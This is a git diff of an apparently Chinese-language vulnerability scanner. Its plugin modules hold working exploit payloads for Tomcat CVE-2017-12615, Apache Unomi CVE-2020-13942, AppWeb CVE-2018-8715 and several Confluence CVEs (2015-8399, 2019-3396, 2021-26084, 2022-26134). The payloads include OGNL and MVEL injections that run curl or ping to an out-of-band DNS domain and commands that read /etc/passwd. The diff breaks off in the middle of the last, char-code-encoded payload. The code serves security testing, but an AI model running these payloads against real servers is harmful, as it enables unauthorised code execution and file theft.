    ' + + if ((res2.status_code == 200) and (text in res2.text)): + results = { + 'Target': res.request.url, + 'Verify': res2.request.url, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Request': res, + 'Request-2': res2 + } + return results + return None + + def EXP(self, clients): + pass + + def Start(self, clients): + return self.POC(clients) diff --git a/payloads/ApacheTomcat/cve_2017_12615.py b/payloads/ApacheTomcat/cve_2017_12615.py deleted file mode 100644 index 78b7224..0000000 --- a/payloads/ApacheTomcat/cve_2017_12615.py +++ /dev/null @@ -1,80 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding:utf-8 -*- - -from lib.tool.md5 import random_md5 -# from lib.tool import check -# import re - -cve_2017_12615_payloads = [ - { - 'path': '{PATH}.jsp/', - 'data': '<% out.println("

    {TEXT}

    "); %>', - 'path-2': '{PATH}.jsp' - }, - { - 'path': '{PATH}.jsp%20', - 'data': '<% out.println("

    {TEXT}

    "); %>', - 'path-2': '{PATH}.jsp' - }, - { - 'path': '{PATH}.jsp::$DATA', - 'data': '<% out.println("

    {TEXT}

    "); %>', - 'path-2': '{PATH}.jsp' - }, - { - 'path': '{PATH}.jsp', - 'data': '<% out.println("

    {TEXT}

    "); %>', - 'path-2': '{PATH}.jsp' - } -] - -def cve_2017_12615_scan(clients): - ''' Tomcat PUT方法任意文件写入漏洞 - PUT方法可用, 上传未做过滤, 可以写入任意文件 - ''' - client = clients.get('reqClient') - - vul_info = { - 'app_name': 'ApacheTomcat', - 'vul_type': 'File-Upload', - 'vul_id': 'CVE-2017-12615', - } - - for payload in cve_2017_12615_payloads: # * Payload - random_str_1 = random_md5(6) - random_str_2 = random_md5(6) - - path = payload['path'].format(PATH=random_str_1) # * Path - data = payload['data'].format(TEXT=random_str_2) # * Data - path_2 = payload['path-2'].format(PATH=random_str_1) # * Path-2 - - res = client.request( - 'put', - path, - data=data, - vul_info=vul_info - ) - if res is None: - continue - - res2 = client.request( - 'get', - path_2, - allow_redirects=False, - vul_info=vul_info - ) - if res2 is None: - continue - - text = '

    ' + random_str_2 + '

    ' - - if ((res2.status_code == 200) and (text in res2.text)): - results = { - 'Target': res.request.url, - 'Verify': res2.request.url, - 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], - 'Request': res, - 'Request-2': res2 - } - return results - return None diff --git a/payloads/ApacheTomcat/main.py b/payloads/ApacheTomcat/main.py deleted file mode 100644 index 8b77671..0000000 --- a/payloads/ApacheTomcat/main.py +++ /dev/null @@ -1,28 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding:utf-8 -*- - -''' - ApacheTomcat扫描类: - Tomcat PUT方法任意文件写入漏洞 - CVE-2017-12615 - Payload: https://vulhub.org/#/environments/tomcat/CVE-2017-12615/ - https://mp.weixin.qq.com/s?__biz=MzI1NDg4MTIxMw==&mid=2247483659&idx=1&sn=c23b3a3b3b43d70999bdbe644e79f7e5 -''' - -# from lib.initial.config import config -from lib.tool.thread import thread -from payloads.ApacheTomcat.cve_2017_12615 import cve_2017_12615_scan - -class Tomcat(): - def __init__(self): - self.app_name = 'ApacheTomcat' - - def addscan(self, clients, vuln=None): - if vuln: - return eval('thread(target={}_scan, clients=clients)'.format(vuln)) - - return [ - thread(target=cve_2017_12615_scan, clients=clients), - ] - -tomcat = Tomcat() \ No newline at end of file diff --git a/payloads/ApacheUnomi/apache-unomi-cve-2020-13942-rce.py b/payloads/ApacheUnomi/apache-unomi-cve-2020-13942-rce.py new file mode 100644 index 0000000..cb03b01 --- /dev/null +++ b/payloads/ApacheUnomi/apache-unomi-cve-2020-13942-rce.py @@ -0,0 +1,106 @@ +#!/usr/bin/env python3 +# -*- coding:utf-8 -*- + +''' +Apache Unomi 是一个基于标准的客户数据平台(CDP, Customer Data Platform) +用于管理在线客户和访客等信息, 以提供符合访客隐私规则的个性化体验 + Apache Unomi 远程表达式代码执行 + CVE-2020-13942 + Payload: https://vulhub.org/#/environments/unomi/CVE-2020-13942/ + +在Apache Unomi 1.5.1级以前版本中, + 存在一处表达式注入漏洞, 远程攻击者通过MVEL和OGNL表达式即可在目标服务器上执行任意命令 +''' + +from lib.api.dns import dns +from lib.tool.md5 import random_md5 +from PluginManager import Vuln_Scan + +class Scan(Vuln_Scan): + def __init__(self): + payload_mvel = '''{"filters": [{"id": "sample","filters": [{"condition": { "parameterValues": {"": "script::Runtime r = Runtime.getRuntime(); r.exec(\\"COMMANDDNSDOMAIN\\");"},"type": "profilePropertyCondition"}}]}],"sessionId": "sample"}''' + payload_ognl = '''{"personalizations":[{"id":"gender-test","strategy":"matching-first","strategyOptions":{"fallback":"var2"},"contents":[{"filters":[{"condition":{"parameterValues":{"propertyName":"(#runtimeclass = #this.getClass().forName(\\"java.lang.Runtime\\")).(#getruntimemethod = #runtimeclass.getDeclaredMethods().{^ #this.name.equals(\\"getRuntime\\")}[0]).(#rtobj = #getruntimemethod.invoke(null,null)).(#execmethod = #runtimeclass.getDeclaredMethods().{? #this.name.equals(\\"exec\\")}.{? #this.getParameters()[0].getType().getName().equals(\\"java.lang.String\\")}.{? #this.getParameters().length < 2}[0]).(#execmethod.invoke(#rtobj,\\"COMMANDDNSDOMAIN\\"))","comparisonOperator":"equals","propertyValue":"male"},"type":"profilePropertyCondition"}}]}]}],"sessionId":"sample"}''' + + self.payloads = [ + # ! MVEL表达式 + { + 'path': 'context.json', + 'data': payload_mvel.replace('COMMAND', 'curl ') + }, + { + 'path': 'context.json', + 'data': payload_mvel.replace('COMMAND', 'curl http://') + }, + { + 'path': 'context.json', + 'data': payload_mvel.replace('COMMAND', 'ping -c 4 ') + }, + { + 'path': 'context.json', + 'data': payload_mvel.replace('COMMAND', 'ping ') + }, + # ! OGNL表达式 + { + 'path': 'context.json', + 'data': payload_ognl.replace('COMMAND', 'curl ') + }, + { + 'path': 'context.json', + 'data': payload_ognl.replace('COMMAND', 'curl http://') + }, + { + 'path': 'context.json', + 'data': payload_ognl.replace('COMMAND', 'ping -c 4 ') + }, + { + 'path': 'context.json', + 'data': payload_ognl.replace('COMMAND', 'ping ') + }, + ] + + def POC(self, clients): + client = clients.get('reqClient') + sessid = '69e506227812d37756fdf19a444de2b5' + + vul_info = { + 'app_name': 'ApacheUnomi', + 'vul_type': 'RCE', + 'vul_id': 'CVE-2020-13942', + } + + headers = { + 'Content-Type': 'application/json' + } + + for payload in self.payloads: + md = random_md5() # * 随机md5值, 8位 + dns_domain = md + '.' + dns.domain(sessid) # * dnslog/ceye域名 + + path = payload['path'] + data = payload['data'].replace('DNSDOMAIN', dns_domain) + + res = client.request( + 'post', + path, + data=data, + headers=headers, + allow_redirects=False, + vul_info=vul_info + ) + if res is None: + continue + + if (dns.result(md, sessid)): + results = { + 'Target': res.request.url, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Request': res + } + return results + return None + + def EXP(self, clients): + pass + + def Start(self, clients): + return self.POC(clients) diff --git a/payloads/ApacheUnomi/cve_2020_13942.py b/payloads/ApacheUnomi/cve_2020_13942.py deleted file mode 100644 index 2254358..0000000 --- a/payloads/ApacheUnomi/cve_2020_13942.py +++ /dev/null @@ -1,92 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding:utf-8 -*- - -from lib.api.dns import dns -from lib.tool.md5 import random_md5 -from time import sleep - -payload_mvel = '''{"filters": [{"id": "sample","filters": [{"condition": { "parameterValues": {"": "script::Runtime r = Runtime.getRuntime(); r.exec(\\"COMMANDDNSDOMAIN\\");"},"type": "profilePropertyCondition"}}]}],"sessionId": "sample"}''' - -payload_ognl = '''{"personalizations":[{"id":"gender-test","strategy":"matching-first","strategyOptions":{"fallback":"var2"},"contents":[{"filters":[{"condition":{"parameterValues":{"propertyName":"(#runtimeclass = #this.getClass().forName(\\"java.lang.Runtime\\")).(#getruntimemethod = #runtimeclass.getDeclaredMethods().{^ #this.name.equals(\\"getRuntime\\")}[0]).(#rtobj = #getruntimemethod.invoke(null,null)).(#execmethod = #runtimeclass.getDeclaredMethods().{? #this.name.equals(\\"exec\\")}.{? #this.getParameters()[0].getType().getName().equals(\\"java.lang.String\\")}.{? #this.getParameters().length < 2}[0]).(#execmethod.invoke(#rtobj,\\"COMMANDDNSDOMAIN\\"))","comparisonOperator":"equals","propertyValue":"male"},"type":"profilePropertyCondition"}}]}]}],"sessionId":"sample"}''' - -cve_2020_13942_payloads = [ - # ! MVEL表达式 - { - 'path': 'context.json', - 'data': payload_mvel.replace('COMMAND', 'curl ') - }, - { - 'path': 'context.json', - 'data': payload_mvel.replace('COMMAND', 'curl http://') - }, - { - 'path': 'context.json', - 'data': payload_mvel.replace('COMMAND', 'ping -c 4 ') - }, - { - 'path': 'context.json', - 'data': payload_mvel.replace('COMMAND', 'ping ') - }, - # ! OGNL表达式 - { - 'path': 'context.json', - 'data': payload_ognl.replace('COMMAND', 'curl ') - }, - { - 'path': 'context.json', - 'data': payload_ognl.replace('COMMAND', 'curl http://') - }, - { - 'path': 'context.json', - 'data': payload_ognl.replace('COMMAND', 'ping -c 4 ') - }, - { - 'path': 'context.json', - 'data': payload_ognl.replace('COMMAND', 'ping ') - }, -] - -def cve_2020_13942_scan(clients): - ''' 在Apache Unomi 1.5.1级以前版本中, - 存在一处表达式注入漏洞, 远程攻击者通过MVEL和OGNL表达式即可在目标服务器上执行任意命令 - ''' - client = clients.get('reqClient') - sessid = '69e506227812d37756fdf19a444de2b5' - - vul_info = { - 'app_name': 'ApacheUnomi', - 'vul_type': 'RCE', - 'vul_id': 'CVE-2020-13942', - } - - headers = { - 'Content-Type': 'application/json' - } - - for payload in cve_2020_13942_payloads: - md = random_md5() # * 随机md5值, 8位 - dns_domain = md + '.' + dns.domain(sessid) # * dnslog/ceye域名 - - path = payload['path'] - data = payload['data'].replace('DNSDOMAIN', dns_domain) - - res = client.request( - 'post', - path, - data=data, - headers=headers, - allow_redirects=False, - vul_info=vul_info - ) - if res is None: - continue - - sleep(3) - if (dns.result(md, sessid)): - results = { - 'Target': res.request.url, - 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], - 'Request': res - } - return results - return None diff --git a/payloads/ApacheUnomi/main.py b/payloads/ApacheUnomi/main.py deleted file mode 100644 index bf90a93..0000000 --- a/payloads/ApacheUnomi/main.py +++ /dev/null @@ -1,33 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding:utf-8 -*- - -''' -Apache Unomi 是一个基于标准的客户数据平台(CDP, Customer Data Platform) -用于管理在线客户和访客等信息, 以提供符合访客隐私规则的个性化体验 - ApacheUnomi扫描类: - Apache Unomi 远程表达式代码执行 - CVE-2020-13942 - Payload: https://vulhub.org/#/environments/unomi/CVE-2020-13942/ - -file:///etc/passwd -file:///C:/Windows/System32/drivers/etc/hosts -file:///C:\Windows\System32\drivers\etc\hosts -''' - -# from lib.initial.config import config -from lib.tool.thread import thread -from payloads.ApacheUnomi.cve_2020_13942 import cve_2020_13942_scan - -class ApacheUnomi(): - def __init__(self): - self.app_name = 'ApacheUnomi' - - def addscan(self, clients, vuln=None): - if vuln: - return eval('thread(target={}_scan, clients=clients)'.format(vuln)) - - return [ - thread(target=cve_2020_13942_scan, clients=clients) - ] - -apacheunomi = ApacheUnomi() diff --git a/payloads/AppWeb/appweb-cve-2018-8715-unauth.py b/payloads/AppWeb/appweb-cve-2018-8715-unauth.py new file mode 100644 index 0000000..c010c63 --- /dev/null +++ b/payloads/AppWeb/appweb-cve-2018-8715-unauth.py @@ -0,0 +1,91 @@ +#!/usr/bin/env python3 +# -*- coding:utf-8 -*- + +''' +AppWeb是Embedthis Software LLC公司负责开发维护的一个基于GPL开源协议的嵌入式Web Server +他使用C/C++来编写, 能够运行在几乎先进所有流行的操作系统上 +当然他最主要的应用场景还是为嵌入式设备提供Web Application容器 + AppWeb 身份认证绕过 + CVE-2018-8715 + Payload: https://vulhub.org/#/environments/appweb/CVE-2018-8715/ + +其7.0.3之前的版本中, 有digest和form两种认证方式, + 如果用户传入的密码为null(也就是没有传递密码参数) + appweb将因为一个逻辑错误导致直接认证成功, 并返回session +''' + +from PluginManager import Vuln_Scan + +class Scan(Vuln_Scan): + def __init__(self): + self.payloads = [ # * 是不是很神奇, payload居然是空的 + {'path': ''}, + {'path': '/'}, + ] + + def POC(self, clients): + client = clients.get('reqClient') + + vul_info = { + 'app_name': 'AppWeb', + 'vul_type': 'unAuthorized', + 'vul_id': 'CVE-2018-8715', + } + + headers = { + 'Authorization': 'Digest username=admin' + } + + for payload in self.payloads: + path = payload['path'] + + res1 = client.request( + 'get', + path, + headers=headers, + vul_info=vul_info + ) + if res1 is None: + continue + + # if ((res1.status_code == 200) and ('Set-Cookie' in res1.headers)): + if (('Set-Cookie' in res1.headers)): + try: + cookie = { + 'Cookie': res1.headers['Set-Cookie'] + } + headers.update(cookie) + except KeyError: + continue + + res2 = client.request( + 'get', + path, + headers=headers, + vul_info=vul_info + ) + if res2 is None: + continue + + if (('401' not in res2.text) + and (('

    Appweb — The Fast, Little Web Server

    ' in res2.text) + or ('documentation' in res2.text) + or ('

    Appweb Resources and Useful Links

    ' in res2.text) + or ('https://embedthis.com/appweb/download.html' in res2.text)) + or ('GitHub Appweb issue database' in res2.text) + or ('All rights reserved. Embedthis and Appweb are trademarks of Embedthis Software LLC.' in res2.text) + ): + results = { + 'Target': res2.request.url, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Cookie': cookie['Cookie'], + 'Request': res2 + } + return results + return None + + def EXP(self, clients): + pass + + def Start(self, clients): + return self.POC(clients) diff --git a/payloads/AppWeb/cve_2018_8715.py b/payloads/AppWeb/cve_2018_8715.py deleted file mode 100644 index c26b08a..0000000 --- a/payloads/AppWeb/cve_2018_8715.py +++ /dev/null @@ -1,75 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding:utf-8 -*- - -# from lib.tool import check -# import re - -cve_2018_8715_payloads = [ # * 是不是很神奇, payload居然是空的 - {'path': ''}, - {'path': '/'}, -] - -def cve_2018_8715_scan(clients): - ''' 其7.0.3之前的版本中, 有digest和form两种认证方式, - 如果用户传入的密码为null(也就是没有传递密码参数) - appweb将因为一个逻辑错误导致直接认证成功, 并返回session - ''' - client = clients.get('reqClient') - - vul_info = { - 'app_name': 'AppWeb', - 'vul_type': 'unAuthorized', - 'vul_id': 'CVE-2018-8715', - } - - headers = { - 'Authorization': 'Digest username=admin' - } - - for payload in cve_2018_8715_payloads: - path = payload['path'] - - res1 = client.request( - 'get', - path, - headers=headers, - vul_info=vul_info - ) - if res1 is None: - continue - - # if ((res1.status_code == 200) and ('Set-Cookie' in res1.headers)): - if (('Set-Cookie' in res1.headers)): - try: - cookie = { - 'Cookie': res1.headers['Set-Cookie'] - } - headers.update(cookie) - except KeyError: - continue - - res2 = client.request( - 'get', - path, - headers=headers, - vul_info=vul_info - ) - if res2 is None: - continue - - if (('401' not in res2.text) - and (('

    Appweb — The Fast, Little Web Server

    ' in res2.text) - or ('documentation' in res2.text) - or ('

    Appweb Resources and Useful Links

    ' in res2.text) - or ('https://embedthis.com/appweb/download.html' in res2.text)) - or ('GitHub Appweb issue database' in res2.text) - or ('All rights reserved. Embedthis and Appweb are trademarks of Embedthis Software LLC.' in res2.text) - ): - results = { - 'Target': res2.request.url, - 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], - 'Cookie': cookie['Cookie'], - 'Request': res2 - } - return results - return None diff --git a/payloads/AppWeb/main.py b/payloads/AppWeb/main.py deleted file mode 100644 index d74df0c..0000000 --- a/payloads/AppWeb/main.py +++ /dev/null @@ -1,33 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding:utf-8 -*- - -''' -AppWeb是Embedthis Software LLC公司负责开发维护的一个基于GPL开源协议的嵌入式Web Server - 他使用C/C++来编写, 能够运行在几乎先进所有流行的操作系统上 - 当然他最主要的应用场景还是为嵌入式设备提供Web Application容器 - AppWeb扫描类: - AppWeb 身份认证绕过 - CVE-2018-8715 - Payload: https://vulhub.org/#/environments/appweb/CVE-2018-8715/ - -file:///etc/passwd -file:///C:\Windows\System32\drivers\etc\hosts -''' - -# from lib.initial.config import config -from lib.tool.thread import thread -from payloads.AppWeb.cve_2018_8715 import cve_2018_8715_scan - -class AppWeb(): - def __init__(self): - self.app_name = 'AppWeb' - - def addscan(self, clients, vuln=None): - if vuln: - return eval('thread(target={}_scan, clients=clients)'.format(vuln)) - - return [ - thread(target=cve_2018_8715_scan, clients=clients) - ] - -appweb = AppWeb() diff --git a/payloads/AtlassianConfluence/atlassian-confluence-cve-2015-8399-fileread-fileinclude.py b/payloads/AtlassianConfluence/atlassian-confluence-cve-2015-8399-fileread-fileinclude.py new file mode 100644 index 0000000..8b1866f --- /dev/null +++ b/payloads/AtlassianConfluence/atlassian-confluence-cve-2015-8399-fileread-fileinclude.py @@ -0,0 +1,78 @@ +#!/usr/bin/env python3 +# -*- coding:utf-8 -*- + +''' +Confluence任意文件包含 + CVE-2015-8399 + Payload: https://blog.csdn.net/caiqiiqi/article/details/106004003 + +Atlassian Confluence 5.8.17之前版本中存在安全, + 该漏洞源于spaces/viewdefaultdecorator.action和admin/viewdefaultdecorator.action文件 + 没有充分过滤'decoratorName'参数, + 远程攻击者可利用该漏洞读取配置文件 +''' + +from lib.tool import check +from PluginManager import Vuln_Scan + +class Scan(Vuln_Scan): + def __init__(self): + self.payloads = [ + {'path': 'admin/viewdefaultdecorator.action?decoratorName=file:///etc/passwd'}, + {'path': 'admin/viewdefaultdecorator.action?decoratorName=file:///C:\Windows\System32\drivers\etc\hosts'}, + {'path': 'admin/viewdefaultdecorator.action?decoratorName=file:///C:/Windows/System32/drivers/etc/hosts'}, + {'path': 'admin/viewdefaultdecorator.action?decoratorName=/WEB-INF/web.xml'}, + {'path': 'viewdefaultdecorator.action?decoratorName=file:///etc/passwd'}, + {'path': 'viewdefaultdecorator.action?decoratorName=file:///C:\Windows\System32\drivers\etc\hosts'}, + {'path': 'viewdefaultdecorator.action?decoratorName=file:///C:/Windows/System32/drivers/etc/hosts'}, + {'path': 'viewdefaultdecorator.action?decoratorName=/WEB-INF/web.xml'}, + {'path': 'spaces/viewdefaultdecorator.action?decoratorName=file:///etc/passwd'}, + {'path': 'spaces/viewdefaultdecorator.action?decoratorName=file:///C:\Windows\System32\drivers\etc\hosts'}, + {'path': 'spaces/viewdefaultdecorator.action?decoratorName=file:///C:/Windows/System32/drivers/etc/hosts'}, + {'path': 'spaces/viewdefaultdecorator.action?decoratorName=/WEB-INF/web.xml'}, + ] + + def POC(self, clients): + client = clients.get('reqClient') + + vul_info = { + 'app_name': 'AtlassianConfluence', + 'vul_type': 'FileRead', + 'vul_id': 'CVE-2015-8399', + } + + headers = { + 'Referer': client.protocol_domain, + 'Origin': client.protocol_domain, + } + + for payload in self.payloads: + path = payload['path'] + + res = client.request( + 'get', + path, + headers=headers, + allow_redirects=False, + vul_info=vul_info + ) + if res is None: + continue + + if (check.check_res_fileread(res.text) # * /etc/passwd or hosts + or (('' in res.text) # * web.xml + and ('Confluence' in res.text)) + ): + results = { + 'Target': res.request.url, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Request': res + } + return results + return None + + def EXP(self, clients): + pass + + def Start(self, clients): + return self.POC(clients) diff --git a/payloads/AtlassianConfluence/atlassian-confluence-cve-2019-3396-fileread.py b/payloads/AtlassianConfluence/atlassian-confluence-cve-2019-3396-fileread.py new file mode 100644 index 0000000..ffde4bf --- /dev/null +++ b/payloads/AtlassianConfluence/atlassian-confluence-cve-2019-3396-fileread.py @@ -0,0 +1,88 @@ +#!/usr/bin/env python3 +# -*- coding:utf-8 -*- + +''' +Confluence路径遍历和命令执行 + CVE-2019-3396 + Payload: https://vulhub.org/#/environments/confluence/CVE-2019-3396/ + +Atlassian Confluence 6.14.2 版本之前存在未经授权的目录遍历漏洞, + 攻击者可以使用 Velocity 模板注入读取任意文件或执行任意命令 +''' + +from lib.tool import check +from PluginManager import Vuln_Scan + +class Scan(Vuln_Scan): + def __init__(self): + self.payloads = [ + # { # * 用于命令执行, 需要将payload保存至.vm文件中, 然后加载远程文件 + # 'path': 'rest/tinymce/1/macro/preview', + # 'data': '{"contentId": "786458", "macro":{"name": "widget", "body":"", "params":{"url": "https://www.example.com/v/123456", "width": "1000"," height": "1000","_template":"https://www.example.com/confluence.vm","command":' + cmd + '}}}', + # 'headers': {'Content-Type': 'application/json; charset=utf-8'} + # }, + { + 'path': 'rest/tinymce/1/macro/preview', + 'data': '{"contentId": "786458", "macro":{"name": "widget", "body":"", "params":{"url": "https://www.viddler.com/v/23464dc6", "width": "1000"," height": "1000","_template":"file:///etc/passwd"}}}', + }, + { + 'path': 'rest/tinymce/1/macro/preview', + 'data': '{"contentId": "786458", "macro":{"name": "widget", "body":"", "params":{"url": "https://www.viddler.com/v/23464dc6", "width": "1000"," height": "1000","_template":"file:///C:\Windows\System32\drivers\etc\hosts"}}}', + }, + { + 'path': 'rest/tinymce/1/macro/preview', + 'data': '{"contentId": "786458", "macro":{"name": "widget", "body":"", "params":{"url": "https://www.viddler.com/v/23464dc6", "width": "1000"," height": "1000","_template":"file:///C:/Windows/System32/drivers/etc/hosts"}}}', + }, + { + 'path': 'rest/tinymce/1/macro/preview', + 'data': '{"contentId": "786458", "macro":{"name": "widget", "body":"", "params":{"url": "https://www.viddler.com/v/23464dc6", "width": "1000"," height": "1000","_template":"../web.xml"}}}', + } + ] + + def POC(self, clients): + client = clients.get('reqClient') + + vul_info = { + 'app_name': 'AtlassianConfluence', + # 'vul_type' = 'FileRead/RCE', + 'vul_type': 'FileRead', + 'vul_id': 'CVE-2019-3396', + } + + headers = { + 'Content-Type': 'application/json; charset=utf-8', + 'Referer': client.protocol_domain + } + + for payload in self.payloads: + path = payload['path'] + data = payload['data'] + + res = client.request( + 'post', + path, + data=data, + headers=headers, + vul_info=vul_info + ) + if res is None: + continue + + # (check.check_res(res.text, self.md)) + if (check.check_res_fileread(res.text) + or (('' in res.text) + and ('Confluence' in res.text)) + ): + results = { + 'Target': res.request.url, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Request': res + } + return results + return None + + def EXP(self, clients): + pass + + def Start(self, clients): + return self.POC(clients) diff --git a/payloads/AtlassianConfluence/atlassian-confluence-cve-2021-26084-rce.py b/payloads/AtlassianConfluence/atlassian-confluence-cve-2021-26084-rce.py new file mode 100644 index 0000000..78c118d --- /dev/null +++ b/payloads/AtlassianConfluence/atlassian-confluence-cve-2021-26084-rce.py @@ -0,0 +1,76 @@ +#!/usr/bin/env python3 +# -*- coding:utf-8 -*- + +''' +Confluence Server Webwork Pre-Auth OGNL表达式命令注入 + CVE-2021-26084 + Payload: https://vulhub.org/#/environments/confluence/CVE-2021-26084/ + +Confluence存在一个OGNL注入漏洞, + 允许未经身份验证的攻击者在Confluence服务器或数据中心实例上执行任意代码 +''' + +from lib.tool.md5 import random_int_2 +from lib.tool import check +from PluginManager import Vuln_Scan + +class Scan(Vuln_Scan): + def __init__(self): + self.random_num_1, self.random_num_2 = random_int_2() + + self.payloads = [ + { + 'path': 'pages/doenterpagevariables.action', + 'data': 'queryString=%5cu0027%2b%7bClass.forName%28%5cu0027javax.script.ScriptEngineManager%5cu0027%29.newInstance%28%29.getEngineByName%28%5cu0027JavaScript%5cu0027%29.%5cu0065val%28%5cu0027var+isWin+%3d+java.lang.System.getProperty%28%5cu0022os.name%5cu0022%29.toLowerCase%28%29.contains%28%5cu0022win%5cu0022%29%3b+var+cmd+%3d+new+java.lang.String%28%5cu0022cat%20/etc/passwd%5cu0022%29%3bvar+p+%3d+new+java.lang.ProcessBuilder%28%29%3b+if%28isWin%29%7bp.command%28%5cu0022cmd.exe%5cu0022%2c+%5cu0022%2fc%5cu0022%2c+cmd%29%3b+%7d+else%7bp.command%28%5cu0022bash%5cu0022%2c+%5cu0022-c%5cu0022%2c+cmd%29%3b+%7dp.redirectErrorStream%28true%29%3b+var+process%3d+p.start%28%29%3b+var+inputStreamReader+%3d+new+java.io.InputStreamReader%28process.getInputStream%28%29%29%3b+var+bufferedReader+%3d+new+java.io.BufferedReader%28inputStreamReader%29%3b+var+line+%3d+%5cu0022%5cu0022%3b+var+output+%3d+%5cu0022%5cu0022%3b+while%28%28line+%3d+bufferedReader.readLine%28%29%29+%21%3d+null%29%7boutput+%3d+output+%2b+line+%2b+java.lang.Character.toString%2810%29%3b+%7d%5cu0027%29%7d%2b%5cu0027', + }, + { + 'path': 'pages/doenterpagevariables.action', + 'data': 'queryString=%5cu0027%2b%7b{NUM1}*{NUM2}%7d%2b%5cu0027'.format(NUM1=self.random_num_1, NUM2=self.random_num_2), + } + ] + + def POC(self, clients): + client = clients.get('reqClient') + + vul_info = { + 'app_name': 'AtlassianConfluence', + 'vul_type': 'RCE', + 'vul_id': 'CVE-2021-26084', + } + + headers = { + 'Referer': client.protocol_domain + } + + for payload in self.payloads: + path = payload['path'] + data = payload['data'] + + res = client.request( + 'post', + path, + data=data, + headers=headers, + allow_redirects=False, + vul_info=vul_info + ) + if res is None: + continue + + random_num_sum = self.random_num_1 * self.random_num_2 + if (check.check_res_fileread(res.text) + or (str(random_num_sum) in res.text) + ): + results = { + 'Target': res.request.url, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Request': res + } + return results + return None + + def EXP(self, clients): + pass + + def Start(self, clients): + return self.POC(clients) diff --git a/payloads/AtlassianConfluence/atlassian-confluence-cve-2022-26134-rce.py b/payloads/AtlassianConfluence/atlassian-confluence-cve-2022-26134-rce.py new file mode 100644 index 0000000..b80db21 --- /dev/null +++ b/payloads/AtlassianConfluence/atlassian-confluence-cve-2022-26134-rce.py @@ -0,0 +1,80 @@ +#!/usr/bin/env python3 +# -*- coding:utf-8 -*- + +''' +Confluence远程代码执行 + CVE-2022-26134 + Payload-1: https://github.com/vulhub/vulhub/tree/master/confluence/CVE-2022-26134 + Payload-2: https://github.com/SNCKER/CVE-2022-26134 + +2022年6月2日Atlassian官方发布了一则安全更新, 通告了一个严重且已在野利用的代码执行漏洞, + 攻击者利用这个漏洞即可无需任何条件在Confluence中执行任意命令 +''' + +from lib.tool.md5 import random_md5 +from lib.tool import check +import base64 +from PluginManager import Vuln_Scan + +class Scan(Vuln_Scan): + def __init__(self): + self.payloads = [ + {'path': '%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22{RCECOMMAND}%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/'}, + {'path': '%24%7BClass.forName%28%22com.opensymphony.webwork.ServletActionContext%22%29.getMethod%28%22getResponse%22%2Cnull%29.invoke%28null%2Cnull%29.setHeader%28%22X-Confluence%22%2CClass.forName%28%22javax.script.ScriptEngineManager%22%29.newInstance%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22eval%28String.fromCharCode%28118%2C97%2C114%2C32%2C114%2C101%2C113%2C61%2C80%2C97%2C99%2C107%2C97%2C103%2C101%2C115%2C46%2C99%2C111%2C109%2C46%2C111%2C112%2C101%2C110%2C115%2C121%2C109%2C112%2C104%2C111%2C110%2C121%2C46%2C119%2C101%2C98%2C119%2C111%2C114%2C107%2C46%2C83%2C101%2C114%2C118%2C108%2C101%2C116%2C65%2C99%2C116%2C105%2C111%2C110%2C67%2C111%2C110%2C116%2C101%2C120%2C116%2C46%2C103%2C101%2C116%2C82%2C101%2C113%2C117%2C101%2C115%2C116%2C40%2C41%2C59%2C13%2C10%2C118%2C97%2C114%2C32%2C99%2C109%2C100%2C61%2C114%2C101%2C113%2C46%2C103%2C101%2C116%2C80%2C97%2C114%2C97%2C109%2C101%2C116%2C101%2C114%2C40%2C34%2C115%2C101%2C97%2C114%2C99%2C104%2C34%2C41%2C59%2C13%2C10%2C118%2C97%2C114%2C32%2C114%2C117%2C110%2C116%2C105%2C109%2C101%2C61%2C80%2C97%2C99%2C107%2C97%2C103%2C101%2C115%2C46%2C106%2C97%2C118%2C97%2C46%2C108%2C97%2C110%2C103%2C46%2C82%2C117%2C110%2C116%2C105%2C109%2C101%2C46%2C103%2C101%2C116%2C82%2C117%2C110%2C116%2C105%2C109%2C101%2C40%2C41%2C59%2C13%2C10%2C118%2C97%2C114%2C32%2C101%2C110%2C99%2C111%2C100%2C101%2C114%2C61%2C80%2C97%2C99%2C107%2C97%2C103%2C101%2C115%2C46%2C106%2C97%2C118%2C97%2C46%2C117%2C116%2C105%2C108%2C46%2C66%2C97%2C115%2C101%2C54%2C52%2C46%2C103%2C101%2C116%2C69%2C110%2C99%2C111%2C100%2C101%2C114%2C40%2C41%2C59%2C13%2C10%2C101%2C110%2C99%2C111%2C100%2C101%2C114%2C46%2C101%2C110%2C99%2C111%2C100%2C101%2C84%2C111%2C83%2C116%2C114%2C105%2C110%2C103%2C40%2C110%2C101%2C119%2C32%2C80%2C97%2C99%2C107%2C97%2C103%2C101%2C115%2C46%2C106%2C97%2C118%2C97%2C46%2C117%2C116%2C105%2C108%2C46%2C83%2C99%2C97%2C110%2C110%2C101%2C114%2C40%2C114%2C117%2C110%2C116%2C105%2C109%2C101%2C46%2C101%2C120%2C101%2C99%2C40%2C99%2C109%2C100%2C41%2C46%2C103%2C101%2C116%2C73%2C110%2C112%2C117%2C116%2C83%2C116%2C114%2C101%2C97%2C109%2C40%2C41%2C41%2C46%2C117%2C115%2C101%2C68%2C101%2C108%2C105%2C109%2C105%2C116%2C101%2C114%2C40%2C34%2C92%2C92%2C65%2C34%2C41%2C46%2C110%2C101%2C120%2C116%2C40%2C41%2C46%2C103%2C101